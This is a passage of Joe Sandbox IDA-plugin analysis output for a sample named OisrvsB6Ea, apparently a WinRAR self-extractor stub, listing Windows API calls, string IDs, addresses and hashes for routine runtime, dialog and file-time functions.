                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 00299711
                                                                                  • _free.LIBCMT ref: 0029971C
                                                                                  • _free.LIBCMT ref: 00299727
                                                                                  • _free.LIBCMT ref: 00299732
                                                                                  • _free.LIBCMT ref: 0029973D
                                                                                  • _free.LIBCMT ref: 00299748
                                                                                  • _free.LIBCMT ref: 00299753
                                                                                  • _free.LIBCMT ref: 0029975E
                                                                                  • _free.LIBCMT ref: 0029976C
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID: 0d*
                                                                                  • API String ID: 776569668-16800759
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00289736
                                                                                  • _wcslen.LIBCMT ref: 002897D6
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 002897E5
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00289806
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0028982D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                  • String ID: Fjun($</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                  • API String ID: 1777411235-2077056101
                                                                                  • Opcode ID: 68a94f5ae92daecdbf35699da2fc860364c25f788e313ebbbbb0cc1054413410
                                                                                  • Instruction ID: 23b291877d650837e066097a40596de3e6734b15b2ed09602c62b275bab86e1f
                                                                                  • Opcode Fuzzy Hash: 68a94f5ae92daecdbf35699da2fc860364c25f788e313ebbbbb0cc1054413410
                                                                                  • Instruction Fuzzy Hash: F83147365393027BE725BF209C06F7BB79CAF83310F18011EF501921C1EB64DA658BA6
                                                                                  APIs
                                                                                  • GetWindow.USER32(?,00000005), ref: 0028D6C1
                                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0028D6ED
                                                                                    • Part of subcall function 00281FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0027C116,00000000,.exe,?,?,00000800,?,?,?,00288E3C), ref: 00281FD1
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0028D709
                                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0028D720
                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0028D734
                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0028D75D
                                                                                  • DeleteObject.GDI32(00000000), ref: 0028D764
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0028D76D
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                  • String ID: STATIC
                                                                                  • API String ID: 3820355801-1882779555
                                                                                  • Opcode ID: c19078d991cc9beb2f41bf4d07f8dfc436ee7ad42eb1c147cb94ff52b8495ed4
                                                                                  • Instruction ID: f23c7928917844dceea3b8731b20153efef3dd6cb91b68b47edb207c7ebee531
                                                                                  • Opcode Fuzzy Hash: c19078d991cc9beb2f41bf4d07f8dfc436ee7ad42eb1c147cb94ff52b8495ed4
                                                                                  • Instruction Fuzzy Hash: 8311E77A9533127BE621BB70EC4EFAFB75CAB44712F004112FA51E10D2DA64CE194BA6
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 322700389-393685449
                                                                                  • Opcode ID: c6b947a10c8a4d53260fd99c33e6c34fa36748e1ff9e9a5262a621fc131688fc
                                                                                  • Instruction ID: 3988d7c61df2d0185540402e35a52cc9d16fa87454b8a5311f99f3ada8cda224
                                                                                  • Opcode Fuzzy Hash: c6b947a10c8a4d53260fd99c33e6c34fa36748e1ff9e9a5262a621fc131688fc
                                                                                  • Instruction Fuzzy Hash: 55B16B7292020AEFCF25DFA4C8819AEBBB5FF14310F14415AE8196B222D735DA75CF91
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n(
                                                                                  • API String ID: 3519838083-3321953544
                                                                                  • Opcode ID: a4e5913577b57cf436204db057e6a4f2bfa5c12f50a26bf33d00cab872652ba9
                                                                                  • Instruction ID: 2d7d82d93870a24517cbd10c38ca1cc792ed48bddf80da06dacf9815872adbd0
                                                                                  • Opcode Fuzzy Hash: a4e5913577b57cf436204db057e6a4f2bfa5c12f50a26bf33d00cab872652ba9
                                                                                  • Instruction Fuzzy Hash: D9716D70A10219EFDF14DF64DC99AAFB7B9FF8A710B144159F416A72A0CB30AD01CB50
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00276FAA
                                                                                  • _wcslen.LIBCMT ref: 00277013
                                                                                  • _wcslen.LIBCMT ref: 00277084
                                                                                    • Part of subcall function 00277A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277AAB
                                                                                    • Part of subcall function 00277A9C: GetLastError.KERNEL32 ref: 00277AF1
                                                                                    • Part of subcall function 00277A9C: CloseHandle.KERNEL32(?), ref: 00277B00
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                  • API String ID: 3122303884-3508440684
                                                                                  • Opcode ID: 87cf4c181cc0f52f992033534f65f1aee52e7e1076bfe8349c9be0a8a514c812
                                                                                  • Instruction ID: 7637b6379472c31c15baf5aec14b85a3ba1c3d3cafcc0dfdd2afb050b143f267
                                                                                  • Opcode Fuzzy Hash: 87cf4c181cc0f52f992033534f65f1aee52e7e1076bfe8349c9be0a8a514c812
                                                                                  • Instruction Fuzzy Hash: 4F412BB1D283457AEF21EB749C86FEEB36C9F05304F008455FA4DA6182D674AA748F21
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028B610
                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0028B637
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0028B650
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0028B661
                                                                                  • GetDlgItem.USER32(?,00000065), ref: 0028B66A
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0028B67E
                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0028B694
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                  • String ID: LICENSEDLG
                                                                                  • API String ID: 3214253823-2177901306
                                                                                  • Opcode ID: 6e1fc1d6943cbb8ea03489ecffc1ed1e8e192960cddb238c03f221c91c02890e
                                                                                  • Instruction ID: 06d01c24c701fa59c6c9454a4a8665d6fdc985ecb292aa6bf1ae73c7decaa7d8
                                                                                  • Opcode Fuzzy Hash: 6e1fc1d6943cbb8ea03489ecffc1ed1e8e192960cddb238c03f221c91c02890e
                                                                                  • Instruction Fuzzy Hash: FC21B6356222167BD612AF66FD4DF3B3B6DEB46741F050019F604A10E0EB529E21D732
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B460B3A9,00000001,00000000,00000000,?,?,0027AF6C,ROOT\CIMV2), ref: 0028FD99
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0027AF6C,ROOT\CIMV2), ref: 0028FE14
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0028FE1F
                                                                                  • _com_issue_error.COMSUPP ref: 0028FE48
                                                                                  • _com_issue_error.COMSUPP ref: 0028FE52
                                                                                  • GetLastError.KERNEL32(80070057,B460B3A9,00000001,00000000,00000000,?,?,0027AF6C,ROOT\CIMV2), ref: 0028FE57
                                                                                  • _com_issue_error.COMSUPP ref: 0028FE6A
                                                                                  • GetLastError.KERNEL32(00000000,?,?,0027AF6C,ROOT\CIMV2), ref: 0028FE80
                                                                                  • _com_issue_error.COMSUPP ref: 0028FE93
                                                                                  Similarity
                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                  • String ID:
                                                                                  • API String ID: 1353541977-0
                                                                                  • Opcode ID: 5e8c4c2c6872e03a733262d14dd549f31aea5a68013f7d107060be5a630641da
                                                                                  • Instruction ID: 12194e793add89531b19709ec1baa22c99a584f4adccd15c2567d99cb13aa25f
                                                                                  • Opcode Fuzzy Hash: 5e8c4c2c6872e03a733262d14dd549f31aea5a68013f7d107060be5a630641da
                                                                                  • Instruction Fuzzy Hash: 78413B75A11205ABCB10EF64DD45BAEBBA8EF49710F10423AF905D72D1DB349920CBA0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00279387
                                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002793AA
                                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 002793C9
                                                                                    • Part of subcall function 0027C29A: _wcslen.LIBCMT ref: 0027C2A2
                                                                                    • Part of subcall function 00281FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0027C116,00000000,.exe,?,?,00000800,?,?,?,00288E3C), ref: 00281FD1
                                                                                  • _swprintf.LIBCMT ref: 00279465
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 002794D4
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00279514
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                  • String ID: rtmp%d
                                                                                  • API String ID: 3726343395-3303766350
                                                                                  • Opcode ID: eca3fb902e5e6e7e124f36cfba60096a4a9d65a4e6dfa01d4d08e3a41089f504
                                                                                  • Instruction ID: b02b892636bcf532053ad0b86b267c3a5a7ce0b0688191918a974df135ed0afe
                                                                                  • Opcode Fuzzy Hash: eca3fb902e5e6e7e124f36cfba60096a4a9d65a4e6dfa01d4d08e3a41089f504
                                                                                  • Instruction Fuzzy Hash: E9413171921365A6DF21EB608C55EDE737CAF55380F4088A5B64DB3052EA388BE98F60
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: U($p($z(
                                                                                  • API String ID: 176396367-848644056
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00289EEE
                                                                                  • GetWindowRect.USER32(?,00000000), ref: 00289F44
                                                                                  • ShowWindow.USER32(?,00000005,00000000), ref: 00289FDB
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00289FE3
                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00289FF9
                                                                                  Similarity
                                                                                  • API ID: Window$Show$RectText
                                                                                  • String ID: ($RarHtmlClassName
                                                                                  • API String ID: 3937224194-3469610180
                                                                                  APIs
                                                                                  • __aulldiv.LIBCMT ref: 0028122E
                                                                                    • Part of subcall function 0027B146: GetVersionExW.KERNEL32(?), ref: 0027B16B
                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00281251
                                                                                  • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00281263
                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00281274
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00281284
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00281294
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002812CF
                                                                                  • __aullrem.LIBCMT ref: 00281379
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                  • String ID:
                                                                                  • API String ID: 1247370737-0
                                                                                  APIs
                                                                                  • _swprintf.LIBCMT ref: 00272536
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                    • Part of subcall function 002805DA: _wcslen.LIBCMT ref: 002805E0
                                                                                  Similarity
                                                                                  • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                  • String ID: ;%u$x%u$xc%u
                                                                                  • API String ID: 3053425827-2277559157
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: </p>$</style>$<br>$<style>$>
                                                                                  • API String ID: 176396367-3568243669
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0029FE02,00000000,00000000,00000000,00000000,00000000,0029529F), ref: 0029F6CF
                                                                                  • __fassign.LIBCMT ref: 0029F74A
                                                                                  • __fassign.LIBCMT ref: 0029F765
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0029F78B
                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0029FE02,00000000,?,?,?,?,?,?,?,?,?,0029FE02,00000000), ref: 0029F7AA
                                                                                  • WriteFile.KERNEL32(?,00000000,00000001,0029FE02,00000000,?,?,?,?,?,?,?,?,?,0029FE02,00000000), ref: 0029F7E3
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1324828854-0
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 0028CE9D
                                                                                    • Part of subcall function 0027B690: _wcslen.LIBCMT ref: 0027B696
                                                                                  • _swprintf.LIBCMT ref: 0028CED1
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • SetDlgItemTextW.USER32(?,00000066,002B946A), ref: 0028CEF1
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0028CF22
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028CFFE
                                                                                  Similarity
                                                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                  • String ID: %s%s%u
                                                                                  • API String ID: 689974011-1360425832
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00292937
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0029293F
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 002929C8
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 002929F3
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00292A48
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 1170836740-1018135373
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                  • API String ID: 176396367-3743748572
                                                                                  APIs
                                                                                    • Part of subcall function 0029C868: _free.LIBCMT ref: 0029C891
                                                                                  • _free.LIBCMT ref: 0029C8F2
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 0029C8FD
                                                                                  • _free.LIBCMT ref: 0029C908
                                                                                  • _free.LIBCMT ref: 0029C95C
                                                                                  • _free.LIBCMT ref: 0029C967
                                                                                  • _free.LIBCMT ref: 0029C972
                                                                                  • _free.LIBCMT ref: 0029C97D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0028E669,0028E5CC,0028E86D), ref: 0028E605
                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0028E61B
                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0028E630
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                  • API String ID: 667068680-1718035505
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0029891E
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 00298930
                                                                                  • _free.LIBCMT ref: 00298943
                                                                                  • _free.LIBCMT ref: 00298954
                                                                                  • _free.LIBCMT ref: 00298965
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID: p*
                                                                                  • API String ID: 776569668-4114540210
                                                                                  APIs
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 002814C2
                                                                                    • Part of subcall function 0027B146: GetVersionExW.KERNEL32(?), ref: 0027B16B
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002814E6
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00281500
                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00281513
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00281523
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00281533
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,00292AF1,002902FC,0028FA34), ref: 00292B08
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00292B16
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00292B2F
                                                                                  • SetLastError.KERNEL32(00000000,00292AF1,002902FC,0028FA34), ref: 00292B81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,002B1098,00294674,002B1098,?,?,002940EF,?,?,002B1098), ref: 002997E9
                                                                                  • _free.LIBCMT ref: 0029981C
                                                                                  • _free.LIBCMT ref: 00299844
                                                                                  • SetLastError.KERNEL32(00000000,?,002B1098), ref: 00299851
                                                                                  • SetLastError.KERNEL32(00000000,?,002B1098), ref: 0029985D
                                                                                  • _abort.LIBCMT ref: 00299863
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 3160817290-0
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0028DC47
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028DC61
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028DC72
                                                                                  • TranslateMessage.USER32(?), ref: 0028DC7C
                                                                                  • DispatchMessageW.USER32(?), ref: 0028DC86
                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0028DC91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 2148572870-0
                                                                                  APIs
                                                                                    • Part of subcall function 0028A699: GetDC.USER32(00000000), ref: 0028A69D
                                                                                    • Part of subcall function 0028A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0028A6A8
                                                                                    • Part of subcall function 0028A699: ReleaseDC.USER32(00000000,00000000), ref: 0028A6B3
                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0028A83C
                                                                                    • Part of subcall function 0028AAC9: GetDC.USER32(00000000), ref: 0028AAD2
                                                                                    • Part of subcall function 0028AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0028AB01
                                                                                    • Part of subcall function 0028AAC9: ReleaseDC.USER32(00000000,?), ref: 0028AB99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                  • String ID: "($($A(
                                                                                  • API String ID: 1061551593-872755984
                                                                                  APIs
